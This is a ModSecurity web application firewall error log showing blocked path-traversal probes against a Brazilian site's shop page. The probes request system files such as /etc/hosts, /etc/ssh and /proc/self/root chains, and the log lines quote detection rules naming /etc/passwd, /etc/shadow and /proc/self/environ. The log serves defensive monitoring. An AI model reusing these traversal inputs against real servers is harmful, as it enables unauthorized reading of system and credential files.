[Thu Mar 19 18:57:23.461839 2026] [:error] [pid 20435:tid 140411632822016] [client 57.141.18.31:55314] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/polkit-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxQ5JaM1-0uhhUQJND_gAAAI0"]
[Thu Mar 19 18:57:24.059647 2026] [:error] [pid 20435:tid 140411565680384] [client 57.141.18.86:55328] [client 57.141.18.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/printcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxRJJaM1-0uhhUQJNEAAAAAJU"]
[Thu Mar 19 18:57:24.367289 2026] [:error] [pid 20435:tid 140411632822016] [client 57.141.18.108:55336] [client 57.141.18.108] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.allow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxRJJaM1-0uhhUQJNEAgAAAI0"]
[Thu Mar 19 18:57:24.869066 2026] [:error] [pid 20435:tid 140411708356352] [client 57.141.18.36:55344] [client 57.141.18.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxRJJaM1-0uhhUQJNEAwAAAIQ"]
[Thu Mar 19 18:57:26.296662 2026] [:error] [pid 20435:tid 140411708356352] [client 74.7.243.128:44174] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxxRZJaM1-0uhhUQJNECQAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 18:57:26.297677 2026] [:error] [pid 20435:tid 140411565680384] [client 57.141.18.95:55354] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf.save"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxRZJaM1-0uhhUQJNEBQAAAJU"]
[Thu Mar 19 18:57:26.324418 2026] [:error] [pid 17887:tid 140411733534464] [client 57.141.18.5:55372] [client 57.141.18.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyslog.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxRgkwaGbbGflqUZD2uAAAAME"]
[Thu Mar 19 18:57:28.275869 2026] [:error] [pid 19655:tid 140411582465792] [client 57.141.18.38:55410] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxSE1ujooLWdUDGy4ACAAAAFM"]
[Thu Mar 19 18:57:28.539360 2026] [:error] [pid 21563:tid 140411624429312] [client 57.141.18.3:55416] [client 57.141.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/netconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxSEpm7ZmxKZTM4bZw6AAAA44"]
[Thu Mar 19 18:57:29.370948 2026] [:error] [pid 14269:tid 140411582465792] [client 57.141.18.73:55432] [client 57.141.18.73] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vimrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxSQbLMZ6AikZjR9WG5QAAABM"]
[Thu Mar 19 18:57:29.726731 2026] [:error] [pid 26799:tid 140411741927168] [client 57.141.18.38:55440] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inputrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxSda6ubjKNq_cu4aAEQAAA0A"]
[Thu Mar 19 18:57:29.988285 2026] [:error] [pid 17887:tid 140411733534464] [client 57.141.18.76:55444] [client 57.141.18.76] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxSQkwaGbbGflqUZD2uQAAAME"]
[Thu Mar 19 18:57:30.847839 2026] [:error] [pid 14269:tid 140411565680384] [client 57.141.18.103:55462] [client 57.141.18.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxSgbLMZ6AikZjR9WG5gAAABU"]
[Thu Mar 19 18:57:31.217223 2026] [:error] [pid 8307:tid 140411699963648] [client 57.141.18.69:55466] [client 57.141.18.69] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxS7-FhjpZGs9ba8qWBAAAAwU"]
[Thu Mar 19 18:57:32.336257 2026] [:error] [pid 7235:tid 140411590858496] [client 57.141.18.41:55492] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/adjtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxTPqxLDW4GITHUkSTLAAAARI"]
[Thu Mar 19 18:57:32.371675 2026] [:error] [pid 8307:tid 140411607643904] [client 57.141.18.100:55496] [client 57.141.18.100] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxTL-FhjpZGs9ba8qWBQAAAxA"]
[Thu Mar 19 18:57:33.338171 2026] [:error] [pid 21563:tid 140411716749056] [client 74.7.243.128:43034] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxxTUpm7ZmxKZTM4bZw6gAAA4M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 18:57:34.471810 2026] [:error] [pid 7893:tid 140411557287680] [client 57.141.18.96:55538] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxThCii7xarUs8iHYWawAAAhY"]
[Thu Mar 19 18:57:34.881957 2026] [:error] [pid 8307:tid 140411649607424] [client 57.141.18.56:55550] [client 57.141.18.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxTr-FhjpZGs9ba8qWBgAAAws"]
[Thu Mar 19 18:57:36.186590 2026] [:error] [pid 15826:tid 140411540502272] [client 57.141.18.77:55574] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxUOoXxyEfFpUF8f840QAAAVg"]
[Thu Mar 19 18:57:36.266287 2026] [:error] [pid 7545:tid 140411741927168] [client 57.141.18.26:55576] [client 57.141.18.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/localtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxUH8B84UptSoTJtY55QAAAYA"]
[Thu Mar 19 18:57:36.695806 2026] [:error] [pid 15826:tid 140411741927168] [client 57.141.18.7:55584] [client 57.141.18.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release-upstream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxUOoXxyEfFpUF8f840gAAAUA"]
[Thu Mar 19 18:57:37.291381 2026] [:error] [pid 30077:tid 140411708356352] [client 57.141.18.107:55594] [client 57.141.18.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxUfu8EFLIOrSqIpvTdgAAAkQ"]
[Thu Mar 19 18:57:38.145567 2026] [:error] [pid 20435:tid 140411708356352] [client 57.141.18.68:55620] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxUpJaM1-0uhhUQJNEEwAAAIQ"]
[Thu Mar 19 18:57:40.176461 2026] [:error] [pid 7235:tid 140411691570944] [client 57.141.18.112:55654] [client 57.141.18.112] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxVPqxLDW4GITHUkSTLwAAAQY"]
[Thu Mar 19 18:57:40.671706 2026] [:error] [pid 17653:tid 140411716749056] [client 57.141.18.44:55664] [client 57.141.18.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locale.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxVMdf6f5d65gmYZSk2gAAAsM"]
[Thu Mar 19 18:57:40.777665 2026] [:error] [pid 20435:tid 140411590858496] [client 57.141.18.53:55668] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxVJJaM1-0uhhUQJNEFQAAAJI"]
[Thu Mar 19 18:57:41.730756 2026] [:error] [pid 30077:tid 140411574073088] [client 57.141.18.51:55692] [client 57.141.18.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxVfu8EFLIOrSqIpvTegAAAlQ"]
